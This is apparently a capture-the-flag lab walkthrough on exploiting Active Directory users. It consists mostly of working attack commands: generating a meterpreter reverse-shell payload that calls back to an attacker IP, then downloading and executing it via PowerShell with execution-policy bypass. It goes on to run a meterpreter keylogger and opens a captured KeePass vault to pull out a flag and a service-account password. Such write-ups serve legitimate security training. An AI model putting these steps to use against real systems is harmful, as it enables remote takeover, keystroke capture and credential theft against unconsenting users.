Exploiting AD users

Users are, unfortunately, often the weakest link in the security chain. Just think about weak passwords and bad habits, such as granting overly permissive permissions. It would be ignorant and ineffective to overlook this attack surface:

  • Credential Management - How users store their credentials. In AD, this is quite important since users may have multiple sets of credentials and remembering all of them can be a hassle.

  • Keylogging - Often, during exploitation, we need to understand how normal users interact with a system. Together with screengrabs, keylogging can be a useful tool to gain this understanding from an attacker’s perspective.

Using our WinRM shell from Kerberos delegation, we do some post-exploit enumeration and come across a .kdbx file in C:\Users\trevor.local\Documents. It’s likely a password vault that’s been encrypted with a strong password.

Payload

Generate a meterpreter payload:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.50.57.175 LPORT=443 -f psh -o pwn.ps1

Start a listener:

sudo msfconsole

msf6> use exploit/multi/handler
msf6> set payload windows/x64/meterpreter_reverse_tcp
msf6> set LHOST kali-vpn-ip
msf6> set LPORT 443
msf6> run

Transfer the payload to the target

Start a Python web server on Kali:

sudo python3 -m http.server 80

Download the file onto THMSERVER1 via the WinRM session and execute it:

powershell.exe -ep bypass

Create a web client object:

$wc = New-Object Net.WebClient

Download pwn.ps1 from Kali and save it in the current directory:

$wc. DownloadFile('http://10.50.57.175/pwn.ps1', "$PWD\pwn.ps1")
.\pwn.ps1

Start the keylogger

meterpreter > keyscan_start

Dump captured keystrokes

meterpreter > keyscan_dump

Stop the keylogger

meterpreter > keyscan_stop

Get flag

sudo apt install -y kpcli
kpcli

# Password is: Imreallysurenoonewillguessmypassword
kpcli:/> open PasswordDatabase.kdbx
kpcli:/> ls
kpcli:/> ls PasswordDatabase/*
kpcli:/> show -f -a PasswordDatabase/General/Flag

THM{AD.Users.Can.Give.Up.Good.Secrets}

kpcli:/> show -f -a PasswordDatabase/General/svcServMan

Sup3rStr0ngPass!@